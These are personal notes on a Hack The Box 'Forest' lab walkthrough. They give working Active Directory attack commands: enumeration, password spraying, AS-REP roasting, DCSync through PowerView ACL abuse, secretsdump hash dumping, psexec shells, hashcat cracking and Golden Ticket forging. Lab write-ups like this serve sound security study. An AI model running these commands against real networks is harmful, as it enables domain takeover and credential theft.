Forest HTB (ippsec) -followthrough

  • try to expose SMB

  • try to expose host names with nslookup

    • 127.0.0.1

    • the actual ip

  • ldapsearch IP -x -s base namingcontexts (find domain info)

  • ldapsearch IP -x -s -b "DC=htb,DC=local" '(objectClass=Person)' FILTERS(what you want to see)

    • for the filter part you can put whatever like sAMAccountName

    • we can do user instead of the person, too

we can do passwordspray once we get the account names.

awk '{print $2}' to print the second part.

make a user list with the valid users (no need to include guest account that ends with $ -- valid users are generally short)

Let's crack them with password!

password list should be short.

Months,Spring, Summer, Winter, Autmn, Fall, Password, Password123, P@ssw0rd, Secret

for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done

  • this adds year at the end of each word.

hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rules

This will mutate the passwords and create a new passwordlist

  • add a ! at the end of each word

  • for i in $(cat pwlist.txt); do echo $i; echo ${i}\!; done

Another technique

  • hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rules -r /usr/share/hashcat/rules/toggles1.rule | sort -u

    • this capitalize different letters | awk 'length ($0) > 8'

Dump password policy

  • crackmapexec smb IP --pass-pol

  • crackmapesex smb IP --pass-pol -u '' -p '' (null authentication attempt)

  • enum4linux

Manual way to look up password policy

if it's showing something like below, it's doing rpc

do rpcclient -U '' IP

and login:

  • enumdom

  • enumdomusers

  • queryusergroups 0x47b (rid)

  • querygroup grouprid to see what kind of domain it is

  • queryuser rid to see password policies

Crack pass

crackmapexec smb IP -u userlist.out -p pwlist.out

----

Impacket GetNPUsers -dc-ip IP -request 'htb.local/' -format hashcat

looks for account that doesn't require kerbero authentication and dump the hashes.

and crack the output

-----

crackmapexec smb IP -u svc-alfresco -p s3rvice --shares

shows shares

---

Use evill-winrm

./evil-winrm.rb -u user -p pass -i IP

---> this should get you to the service level shell

---

Priv Esc

bloodhound

On Kali:

  • download the zip file and the bloodhound application file separately.

  • After downloading, unzip the application file.

  • Download neo4j

neo4j console -> set a new password (default is neo4j) by visiting the localhost:PORT

  • Now execute the Bloodhound with ./Bloodhound --no-sandbox and logiin

On the victim's machine, upload or use the mounted drive to run the SharpHound.exe

./SharpHound.exe -c all

On kali,

  • drop the bloodhound zip file onto the browser which should start processing

On the search bar, type in the user that you already know and mark it as owned

-> show paths from owned principles -> shows a map

If you see an account operation group, they can create users

On victim's,

net user gori gorigori(pass) /add /domain

this should create an account.

net group "Exchange Windows Permissions" /add gori

net group "Exchange Windows Permissions" will verify that the user has been added.

On bloodhound, click the link "WriteDacl" > Abuseinfo

Add-DomainObjectAcl -Credentials $cred -TargetIdentity testlab.local -Rights DCSync

This is a powerview command .

Download the dev version of the powersploit with the -b dev on git clone

copy the powerview.ps1 over to the victim's machine.

$pass= convertto-securestring 'gorigori' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential('HTBl\gori', $pass)

Add-DomainObjectAcl -Credentials $cred -TargetIdentity "DC=htb, DC=local" -PrincipalIdentity gori -Rights DCSync

Then on kali,

use impacket's secretsdump.py htb/gori:gorigori@IP

grab the last :HASH: part for the admin account

Crack the pass

crackmapexec smb IP -u administrator -H HASH

psexec.py htb.local/Administrator:Pass@10.129.138.20

This should get you a root shell.

---

Another way to crack

NTLM password cracking: 

cat hash.out | grep ::: | awk -F: '{print $1":"$4}'

and do 

hashcat --user -m 1000 new_hashes.out rockyou.txt -r rules/InsidePro-PasswordsPro.rule

  • --user will recognize the format "user:hash"

  • --show will show users

----

Golden Ticket method

copy the krbtgt hash.

On the victim's machine, run the following command to get the -domain-sid 

Get-ADDomain htb.local

Golden ticket
With Impacket examples:

# To generate the TGT with NTLM
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
#
# 
# To generate the TGT with AES key
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

#username can be anything.

  • ipaddress address should not be used for the remote_hostname. Always add the host name to the hosts file.

if it says the time is wrong, we have to change our time --- nmap shows clockstew.

date -s TIME

to change time

PreviousHTB Write-up Active (Windows) - Active DirectoryNextPass the NTLM hash

Last updated